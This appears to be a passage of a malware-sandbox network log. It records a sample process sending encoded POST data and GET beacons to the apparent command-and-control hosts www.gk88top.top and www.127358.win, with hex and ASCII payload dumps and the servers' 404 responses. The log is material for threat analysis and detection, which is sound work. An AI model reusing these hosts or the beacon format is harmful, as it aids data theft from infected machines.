                                                                    Data Raw: 4b 78 5a 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 4a 53 63 6d 58 2b 6d 38 2f 2f 66 4f 44 67 42 63 75 6b 32 55 39 39 72 39 62 71 35 4f 57 78 76 52 2f 35 70 39 4e 45 74 6f 77 76 64 57 6c 49 6f 70 70 62 37 5a 78 79 30 76 63 57 56 39 77 63 53 2f 41 70 32 32 44 4d 38 73 32 46 68 37 67 68 52 54 72 4d 50 4b 46 68 55 56 7a 62 62 68 41 5a 69 72 77 75 47 62 30 72 4a 6e 69 65 4e 54 43 4b 42 4f 52 6d 75 32 55 62 42 33 54 50 4e 33 4c 72 30 58 37 78 71 44 75 33 6c 42 6e 36 67 6b 4c 64 53 79 75 35 2b 49 30 4c 39 7a 59 68 42 4e 56 5a 37 33 2f 6f 6b 46 59 41 6d 34 32 56 50 79 6b 35 37 6b 73 41 74 6c 4a 70 68 79 7a 32 55 44 62 76 70 73 4c 62 4f 36 62 57 6d 30 58 47 2b 75 71 4c 57 5a 73 58 33 36 6f 77 3d 3d
                                                                    Data Ascii: KxZ=y/nbf6lCzqeuJScmX+m8//fODgBcuk2U99r9bq5OWxvR/5p9NEtowvdWlIoppb7Zxy0vcWV9wcS/Ap22DM8s2Fh7ghRTrMPKFhUVzbbhAZirwuGb0rJnieNTCKBORmu2UbB3TPN3Lr0X7xqDu3lBn6gkLdSyu5+I0L9zYhBNVZ73/okFYAm42VPyk57ksAtlJphyz2UDbvpsLbO6bWm0XG+uqLWZsX36ow==


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    3 | 192.168.2.6 | 49912 | 104.21.7.187 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:05:52.076924086 CET | 1888 | OUT | POST /vjnn/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.gk88top.top
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 1244
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.gk88top.top
                                                                    Referer: http://www.gk88top.top/vjnn/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 4a 53 63 6d 58 2b 6d 38 2f 2f 66 4f 44 67 42 63 75 6b 32 55 39 39 72 39 62 71 35 4f 57 78 6e 52 2f 71 52 39 4f 69 6c 6f 69 2f 64 57 35 59 6f 53 70 62 37 59 78 78 45 72 63 57 5a 48 77 66 71 2f 41 4c 4f 32 42 35 63 73 38 46 68 37 6f 42 52 51 6d 73 50 6c 46 68 45 4a 7a 61 33 68 41 5a 69 72 77 75 71 62 39 5a 78 6e 78 4f 4e 51 56 36 42 61 56 6d 75 53 55 62 5a 6e 54 50 5a 4e 4c 61 55 58 38 52 61 44 72 45 42 42 6c 61 68 43 4f 64 54 79 75 35 7a 57 30 4c 67 43 59 69 64 7a 56 65 54 33 2b 4d 6b 47 41 78 2b 50 69 46 48 73 34 37 37 67 67 58 42 78 41 76 31 2f 37 67 49 45 47 2b 6f 62 54 4d 75 77 58 78 50 47 51 67 79 54 75 65 4b 4c 74 33 2f 7a 7a 48 56 36 36 62 74 35 61 76 45 65 45 75 78 69 53 53 30 55 48 45 4a 70 4a 39 6b 66 4c 65 71 4e 47 36 70 62 4c 75 42 44 76 67 70 61 2f 44 44 55 4e 30 2b 50 67 35 6d 65 61 30 47 35 45 61 46 75 79 58 71 6a 54 4f 34 36 73 55 33 44 31 33 33 4c 73 6b 64 4b 69 55 37 46 2f 58 73 43 51 30 58 47 42 7a 39 47 4a 37 4a 61 67 46 32 6a 47 2b [TRUNCATED]
                                                                    Data Ascii: KxZ=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 [TRUNCATED]


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    4 | 192.168.2.6 | 49918 | 104.21.7.187 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:05:54.727844000 CET | 591 | OUT | GET /vjnn/?KxZ=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH2C1TuTspqujhZjoi+NfkMLWXoMO10ul5nspQNZd1SB2qR4JUaa0=&T2M=Y0Z0G HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.gk88top.top
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Dec 6, 2024 10:05:56.367559910 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 06 Dec 2024 09:05:56 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BfEY4MD7EiNSxpUccanJMTEy9vKgxk8JqK79xGUR5yRb92JEMa44UP1sjKcLUf3e2bMVLBPx4LdwJFOsKgFZ6Fkb3E2RoXOzZ%2BurN0k1tdkibbNboX4W%2FFD3FyxgdhHvDbc%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8edb1df2c834439c-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1556&rtt_var=778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=591&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 [TRUNCATED]
                                                                    Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;
                                                                    Dec 6, 2024 10:05:56.367640018 CET | 656 | IN | Data Raw: 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a
                                                                    Data Ascii: padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}
                                                                    Dec 6, 2024 10:05:56.905147076 CET | 1236 | IN | Data Raw: 37 66 66 61 0d 0a 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41 45 44 43 41 59 41 41 41 43
                                                                    Data Ascii: 7ffa<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJQFURFRQEb
                                                                    Dec 6, 2024 10:05:56.905164003 CET | 224 | IN | Data Raw: 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d 58 54 35 43 59 56 56 42 4d 41 58 4f 43 68 6b 57 63 7a 54 6c 78 2f 5a 73 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a
                                                                    Data Ascii: DdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2
                                                                    Dec 6, 2024 10:05:56.905184984 CET | 1236 | IN | Data Raw: 48 52 75 58 6e 30 41 49 59 57 64 75 35 2b 54 59 62 67 78 65 4e 2b 78 37 64 76 54 54 53 6a 48 48 77 43 50 69 58 67 34 4d 4c 45 77 55 6c 33 65 53 51 38 50 79 4c 52 7a 58 73 67 56 72 52 2f 75 75 58 76 7a 31 50 4c 4f 72 35 66 5a 2f 64 62 57 62 56 43
                                                                    Data Ascii: HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/uuXvz1PLOr5fZ/dbWbVCzCMhrkwWpBKIw13fRA+BxWO6D0BaArrBTakEQPh0wUICvsACE+gpbvOa6znkowE0AZntGEmNVUnJzFwIbvWEVVUWYEYC2Lu2dhz/xOCz30bqoExxwfdbS73jwnL1R1QMyAXbGRf3y8ChnANxXYsgYo2TTnZIQ2R0b
                                                                    Dec 6, 2024 10:05:56.905195951 CET | 1236 | IN | Data Raw: 43 63 44 54 73 4a 4f 65 41 4d 44 4b 31 6e 4a 33 31 73 46 38 61 48 58 75 52 42 44 35 6c 47 4b 64 54 45 65 68 2b 56 36 62 45 37 31 65 49 35 4c 50 70 4f 55 4c 6f 43 7a 36 37 42 79 41 4a 77 72 36 75 53 79 49 2b 4d 72 51 74 37 56 65 75 6e 42 4d 61 73
                                                                    Data Ascii: CcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8otMbABahkHg2jsPZmHjTPXBok+9wCwDbaWy7ImOkSF7HshljJTH4lfbRcJAk2+k8ROVtnvfgMB6H5Xps7v6pOC7pcnqGCqAgO+0kQ47BeoRlR8brAHwHoFH+4wyooQaV
                                                                    Dec 6, 2024 10:05:56.905214071 CET | 1236 | IN | Data Raw: 45 30 41 63 32 6a 73 58 79 38 74 41 37 50 72 73 4c 4b 74 59 6b 6c 34 61 37 4a 68 4f 77 53 43 41 2f 4d 4d 43 6c 79 4a 78 32 47 35 46 67 35 32 58 74 4e 4d 63 32 34 61 31 43 6f 6c 65 59 54 5a 44 2f 36 78 37 4d 6a 34 31 77 43 4d 74 32 58 73 70 65 4b
                                                                    Data Ascii: E0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP7aB/DgAjwOy5UQMQC2UmBMZtGUC5VQWBmvglgBYNmR8e0ALIGNDz4RUnvWaz2GRrQeDI4a2G+a
                                                                    Dec 6, 2024 10:05:56.905225992 CET | 672 | IN | Data Raw: 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52 44 66 5a 6a 50 69 2f 6e 50 54 6b 34 39 62 7a 5a 49 41 44 46 74
                                                                    Data Ascii: qcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2//iUPDsc41B1juZqV1XPXi
                                                                    Dec 6, 2024 10:05:56.905239105 CET | 1236 | IN | Data Raw: 74 72 57 62 66 6f 50 30 43 39 6b 68 67 6c 41 58 77 42 6e 37 64 6b 6d 5a 35 73 2b 4d 31 36 66 55 51 31 58 6b 74 35 41 59 61 45 4f 50 4e 39 73 36 59 78 4e 4b 51 55 2b 79 33 2b 64 35 72 67 44 69 30 39 63 79 49 42 4f 33 63 58 4f 72 65 77 6c 52 2f 39
                                                                    Data Ascii: trWbfoP0C9khglAXwBn7dkmZ5s+M16fUQ1Xkt5AYaEOPN9s6YxNKQU+y3+d5rgDi09cyIBO3cXOrewlR/9rMRj1jQ1G/STIM6kYAJ9CDmz+c32W57i7Zf10PZYu3dqvbOSPo1DSdyNU3O+4J84Ej1XgsIMt2OWQEq7DDuvdBsMuikzaFnvr2M4bH++ck2nJnafhhTfqBJU7OfN4TOmEnPS2PoImih7dHeEgy6GMALDRYNQfNBj1
                                                                    Dec 6, 2024 10:05:56.905360937 CET | 1236 | IN | Data Raw: 6d 57 44 30 36 30 53 65 32 53 71 37 4b 39 52 7a 58 67 36 6f 4f 38 64 42 51 76 74 6b 53 77 71 39 6a 38 31 48 58 47 45 66 69 47 52 6d 51 78 73 74 42 4c 62 54 4a 4e 35 47 56 73 52 4b 53 49 39 2b 36 4f 48 54 67 68 63 59 79 41 73 6c 65 65 35 69 77 38
                                                                    Data Ascii: mWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee5iw8OEQCNIOwhChXB8/Z2ZkUA1xzt+9+NwagvZ4gdPgry4vkiAG1RhKrrAwSeO9uobGCofu2ByS1nbpiGQO+1IHqwpGGFF72Eq5Y6ELAw79hitijOqUwLpx1Wr3rh+wFsIwD3slO/OvjZT02OJFzujHyBciqOf7FWpVrn
                                                                    Dec 6, 2024 10:05:56.913495064 CET | 1236 | IN | Data Raw: 47 2f 6b 42 47 7a 4c 7a 49 41 42 35 64 56 6d 56 67 33 33 6b 6e 2f 4a 64 39 69 4d 35 49 7a 72 31 31 4d 7a 38 36 2f 64 57 52 70 57 4c 50 45 78 68 54 64 2f 47 51 4c 66 7a 55 61 54 4a 73 68 56 5a 44 77 38 7a 46 77 55 49 6a 64 64 43 4d 4b 65 4b 77 6d
                                                                    Data Ascii: G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZU/LvwrBNrzUY9R8C2A/CFCgYUQF5Uyai3W83rNZw6JIta5cdvrgMJf1Xgwqp/kT4hUXGjkRV7XIQmuc78x37amexRp3FlpdhwAbkmwJZJbHVurOL


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    5 | 192.168.2.6 | 49939 | 206.238.89.119 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:06:03.585201979 CET | 848 | OUT | POST /2mep/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.127358.win
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 208
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.127358.win
                                                                    Referer: http://www.127358.win/2mep/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 44 6a 6e 6f 62 4d 75 69 6f 6c 36 49 4c 70 7a 32 4f 4d 66 30 49 4d 53 78 2b 65 6a 6a 74 4c 4e 72 56 35 2b 57 62 6f 51 36 39 41 72 4b 6d 70 63 44 4e 48 36 6e 2f 7a 4c 45 36 66 77 62 4a 70 71 61 75 30 6f 4c 69 54 51 37 50 46 73 7a 34 46 6e 45 4c 2b 43 75 31 2b 44 52 76 74 45 51 54 51 43 38 65 6b 39 55 41 53 73 4b 4d 66 6c 76 66 52 4e 75 4f 31 71 65 4a 66 39 75 61 6f 32 51 75 47 70 30 44 2b 59 71 58 75 72 49 4c 41 45 2b 4b 2b 2b 78 35 74 43 6a 2b 6c 4b 56 62 43 38 54 53 50 32 34 6d 4b 71 44 50 6b 6f 6f 6e 2b 5a 67 4d 7a 77 6f 34 57 32 75 50 49 31 32 6b 6b 43 6f 4a 57 39
                                                                    Data Ascii: KxZ=duT9QTO+95xe8DjnobMuiol6ILpz2OMf0IMSx+ejjtLNrV5+WboQ69ArKmpcDNH6n/zLE6fwbJpqau0oLiTQ7PFsz4FnEL+Cu1+DRvtEQTQC8ek9UASsKMflvfRNuO1qeJf9uao2QuGp0D+YqXurILAE+K++x5tCj+lKVbC8TSP24mKqDPkoon+ZgMzwo4W2uPI12kkCoJW9
                                                                    Dec 6, 2024 10:06:05.091571093 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:06:04 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    6 | 192.168.2.6 | 49947 | 206.238.89.119 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:06:06.249603033 CET | 872 | OUT | POST /2mep/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.127358.win
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 232
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.127358.win
                                                                    Referer: http://www.127358.win/2mep/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 69 54 6e 37 4d 51 75 6b 49 6c 39 57 62 70 7a 34 65 4d 62 30 49 41 53 78 38 7a 6f 69 66 76 4e 73 30 4a 2b 48 76 63 51 33 64 41 72 53 32 70 64 64 39 48 48 6e 2f 2f 31 45 37 6a 77 62 4e 4a 71 61 75 45 6f 4c 52 4c 66 34 2f 46 35 37 59 46 70 62 37 2b 43 75 31 2b 44 52 76 35 2b 51 58 38 43 38 75 55 39 57 68 53 6a 41 73 66 6d 73 66 52 4e 34 4f 31 75 65 4a 66 62 75 62 45 63 51 6f 4b 70 30 42 32 59 71 47 75 6f 43 4c 41 43 6a 36 2f 39 67 34 77 6e 76 76 59 4f 58 4a 71 6c 49 52 4c 49 35 51 58 77 66 38 6b 4c 36 33 65 62 67 4f 72 43 6f 59 57 63 73 50 77 31 6b 7a 6f 6c 6e 39 7a 65 74 2b 51 48 70 65 58 34 6c 55 4e 65 6f 4e 37 63 34 37 71 56 6d 51 3d 3d
                                                                    Data Ascii: KxZ=duT9QTO+95xe8iTn7MQukIl9Wbpz4eMb0IASx8zoifvNs0J+HvcQ3dArS2pdd9HHn//1E7jwbNJqauEoLRLf4/F57YFpb7+Cu1+DRv5+QX8C8uU9WhSjAsfmsfRN4O1ueJfbubEcQoKp0B2YqGuoCLACj6/9g4wnvvYOXJqlIRLI5QXwf8kL63ebgOrCoYWcsPw1kzoln9zet+QHpeX4lUNeoN7c47qVmQ==
                                                                    Dec 6, 2024 10:06:07.739245892 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:06:07 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    7 | 192.168.2.6 | 49956 | 206.238.89.119 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:06:08.909856081 CET | 1885 | OUT | POST /2mep/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.127358.win
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 1244
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.127358.win
                                                                    Referer: http://www.127358.win/2mep/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
